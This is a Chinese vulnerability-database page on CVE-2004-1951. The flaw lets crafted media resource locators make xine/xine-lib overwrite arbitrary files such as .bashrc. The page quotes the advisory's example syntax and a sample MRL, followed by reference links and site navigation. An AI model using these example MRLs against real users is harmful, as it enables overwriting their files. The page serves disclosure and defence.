Xine和Xine-Lib多个远程文件覆盖漏洞-安全小百科

Xine和Xine-Lib多个远程文件覆盖漏洞

漏洞ID	1107898	漏洞类型	设计错误
发布时间	2004-04-22	更新时间	2005-10-20
CVE编号	CVE-2004-1951	CNNVD-ID	CNNVD-200412-737
漏洞平台	Linux	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/24038
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-737

|漏洞详情

Xine是Linux系统下播放VCD/DVD的程序。Xine-lib媒体播放器在打开恶意MRL时存在问题，远程攻击者可以利用这个漏洞以应用程序进程覆盖任意内容到系统任意文件中。MRLs(mediaresourcelocator)是xine-lib库使用的URI用于描述要播放的内容位置，MRLS也提供多个功能提供xine配置选项，这些选项在播放之前被使用，但是部分xine配置指定文件选项在重放过程中会被写入内容，如”audio.sun_audio_device”指定SUN机器上的音频设备，音频流的解码PCM样例会写入到这个文件。通过用户打开类似如下MRL：”http://myserver/mybashrc#audio.sun_audio_device:.bashrc”更改”audio.sun_audio_device”选项值并播放特殊构建音频流，攻击者可覆盖系统文件，导致产生拒绝服务。

|漏洞EXP

source: http://www.securityfocus.com/bid/10193/info

It has been reported that the xine media player and the xine media library are affected by multiple remote file overwrite vulnerabilities. This is due to a design error that allows various media resource file configurations to write to arbitrary files.

It is possible to set these configuration parameters to write to arbitrary files on the affected system. It should be noted that this issue, as it is currently known, only affects Sun based systems as well as those using the DXR3 or Hollywood+ MPEG decoder audio card. It has been conjectured however that similar configuration parameters exists that affect other systems.

The configuration syntax:

"cfg:/audio.sun_audio_device:targetFile" 

If followed by the entry:

"http://www.example.com/attackerSpecifiedFile"

Will cause the attacker specified file to be written to the target file.

|参考资料

来源:BID
名称:10193
链接:http://www.securityfocus.com/bid/10193
来源:GENTOO
名称:GLSA-200404-20
链接:http://security.gentoo.org/glsa/glsa-200404-20.xml
来源:XF
名称:xine-mrl-file-overwrite(15939)
链接:http://xforce.iss.net/xforce/xfdb/15939
来源:www.xinehq.de
链接:http://www.xinehq.de/index.php/security/XSA-2004-2
来源:www.xinehq.de
链接:http://www.xinehq.de/index.php/security/XSA-2004-1
来源:SLACKWARE
名称:SSA:2004-111
链接:http://www.slackware.com/security/viewer.php?l=slackware-security&y;=2004&m;=slackware-security.372791
来源:SECUNIA
名称:11433
链接:http://secunia.com/advisories/11433
来源:OSVDB
名称:5739
链接:http://www.osvdb.org/5739
来源:OSVDB
名称:5594
链接:http://www.osvdb.org/5594
来源：NSFOCUS
名称：6367
链接：http://www.nsfocus.net/vulndb/6367

相关推荐: Multiple Vendor RPC Denial of Service Vulnerability

Multiple Vendor RPC Denial of Service Vulnerability 漏洞ID 1104862 漏洞类型 Design Error 发布时间 1998-11-13 更新时间 1998-11-13 CVE编号 N/A CNNVD…

文章版权归作者所有，未经允许请勿转载。

THE END

网络安全漏洞
# 漏洞 # cnnvd # xine

喜欢就支持一下吧

Xine和Xine-Lib多个远程文件覆盖漏洞

Xine和Xine-Lib多个远程文件覆盖漏洞

|漏洞来源

|漏洞详情

|漏洞EXP

|参考资料

ChatGPT问答: RiscV 汇编怎么写 1到100 数字之和代码 RISC-V 汇编语言入门 add, sub, lw, sw, j 常用指令

RARS 汇编模拟器支持的RISC-V指令

使用FFMPEG快速替换视频中的音频

2023.03.26 我去年买了个表，一直走不准，现在终于可以设置时间了

GPt-4: 对业余爱好者来说，学习编程有很多好处。

Debian 11 安装 RISC-V 和 Mips64 的 GNU gcc编译器工具链的笔记

公司成功上市啦！ – 作者:KOAL格尔国信

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

女祭女戚

帆软10.0 Getshell漏洞分析

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa

UML_NET Integer Mismanagement Code Execution Vulnerability

Kerberos FTP客户端代码执行漏洞

Bash设计错误漏洞

Novell GroupWise WebAccess未授权访问漏洞

Longshine Wireless Access Point Devices Information Disclosure Vulnerability

Netwin DMailWeb & CWMai多重DoS漏洞

付费下载测试

Python网络开发简单的IP城市定位WebAPI

zibll子比主题 v5.6最新免授权版

创建不做身份鉴定的HTTPClient发送HTTPS的POST请求的工具类，解决异常：sun.security.validator.ValidatorException: PKIX path vali

Attack tive Directory – 作者:sec875

免费领爱企查两年会员

公司成功上市啦！ – 作者:KOAL格尔国信

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

女祭女戚

帆软10.0 Getshell漏洞分析

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa